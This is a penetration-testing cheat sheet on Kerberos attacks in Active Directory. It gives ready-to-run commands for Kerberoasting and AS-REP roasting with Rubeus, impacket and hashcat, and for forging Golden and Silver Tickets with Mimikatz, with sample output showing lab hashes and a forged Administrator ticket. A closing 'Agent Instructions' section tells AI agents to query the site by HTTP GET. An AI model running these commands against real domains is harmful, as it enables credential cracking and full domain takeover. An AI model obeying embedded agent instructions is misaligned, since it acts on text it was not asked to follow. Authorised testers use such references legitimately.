# Kerberos Attacks

## Relationships and Attack paths

We can use [bloodhound ](/infrastructure-testing/tools/bloodhound.md)to find hidden relationships and attack paths in an Active Directory environment.

From the data collect we can escalate our privilege to the target, or use tools like [aclpwn](/infrastructure-testing/tools/bloodhound/aclpwn.md).

## Kerberoasting

The [AD Powershell ](https://github.com/samratashok/ADModule)module can be used to search for users with SPN

| `Import-Module .\Microsoft.ActiveDirectory.Management.dll -Verbose`  `Get-ADUser -LdapFilter "(&(objectCategory=person)(objectClass=user)(servicePrincipalName=*))"` `\| Format-Table Name, DistinguishedNam` |
| ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |

Using Nmap:&#x20;

`nmap $TARGET -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='test'`&#x20;

Using Rubeus to gain hashes:&#x20;

`Rubeus.exe kerberoast /outfile:hashes.txt`&#x20;

&#x20;Use the hashcat -m 13100 (Kerberos 5 TGS-REP etype 23) to crack: &#x20;

`hashcat -a 0` `-m 13100` `SPN.hash /wordlists/rockyou.txt`

Using impacket:

```
python GetUserSPNs.py <domain_name>/<domain_user>:<domain_user_password> -outputfile <output_TGSs_file>
```

<https://newerasec.com/kerberoasting/>

## AS-RES

Find users with pre-auth enabled using the [AD Powershell ](https://github.com/samratashok/ADModule)module :

```
Import-Module .\Microsoft.ActiveDirectory.Management.dll -Verbose

Get-ADUser -Filter 'useraccountcontrol -band 4194304' -Properties useraccountcontrol | Format-Table name
```

To exploit run:

```
.\Rubeus.exe asreproast
```

Impacket:

```
# check ASREPRoast for all domain users (credentials required)
python GetNPUsers.py <domain_name>/<domain_user>:<domain_user_password> -request -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>

# check ASREPRoast for a list of users (no credentials required)
python GetNPUsers.py <domain_name>/ -usersfile <users_file> -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>
```

<https://newerasec.com/as-roast/>

## Golden Ticket

Once you gained the krbtgt hash (from dcsync or DC compromise)T

The Mimikatz kerberos::golden module handles Golden Tickets

We need the following parameters: &#x20;

* /domain - name of the domain
* /sid - the sid of the domain (can be obtain from 'whoami /user' , remember to remove the RID)
* /rc4 - the NTLM hash of krbtgt
* /user - the user you want to create the new TGT ticket for
* /id - the RIF of that user you looking to create ticket for
* /ptt - (Optional) inject the new ticket into the current session, if not applied the ticket will be saved to a file

```
mimikatz # kerberos::golden /domain:eth.lab /sid:S-1-5-21-98033113-2199257571-2188946577 /rc4:88a4507aae31297a2df7921b1430d781 /user:Administrator /id:500  /ptt
User      : Administrator
Domain    : eth.lab (ETH)
SID       : S-1-5-21-98033113-2199257571-2188946577
User Id   : 500
Groups Id : *513 512 520 518 519
ServiceKey: 88a4507aae31297a2df7921b1430d781 - rc4_hmac_nt
Lifetime  : 06/04/2020 14:05:45 ; 04/04/2030 14:05:45 ; 04/04/2030 14:05:45
-> Ticket : ** Pass The Ticket **
 
 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated
 
Golden ticket for 'Administrator @ eth.lab' successfully submitted for current session 
```

## Silver Ticket

use the 'kerberos::golden' module to forge TGS, we will need to pass the following parameters:

* /domain: The FDQN
* /sid: The SID (Security Identifier) of the Domain (whoami /user)
* /user: Target Account/Computer to Impersonate
* /id: RID of the account you will be impersonating
* /ptt: Optional ( will automatically inject the ticket into the current session)
* /rc4: NTLM Hash of User Password/Computer Password
* /service: the service we want to access

**Example:**

```
mimikatz # kerberos::golden /sid:S-1-5-21-98033113-2199257571-2188946577-500 /domain:eth.lab /ptt /id:500 /target:WIN-EU4DLP9KRRC.eth.lab /service:cifs /rc4:0c0d4252608be9131c2826a6feaf94b8 /user:Administrator
User      : Administrator
Domain    : eth.lab (ETH)
SID       : S-1-5-21-98033113-2199257571-2188946577-500
User Id   : 500
Groups Id : *513 512 520 518 519
ServiceKey: 0c0d4252608be9131c2826a6feaf94b8 - rc4_hmac_nt
Service   : cifs
Target    : WIN-EU4DLP9KRRC.eth.lab
Lifetime  : 03/04/2020 17:00:01 ; 01/04/2030 17:00:01 ; 01/04/2030 17:00:01
-> Ticket : ** Pass The Ticket **
 
 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated
 
Golden ticket for 'Administrator @ eth.lab' successfully submitted for current session
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://infra.newerasec.com/infrastructure-testing/exploitation/windows/kerberos-attacks.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.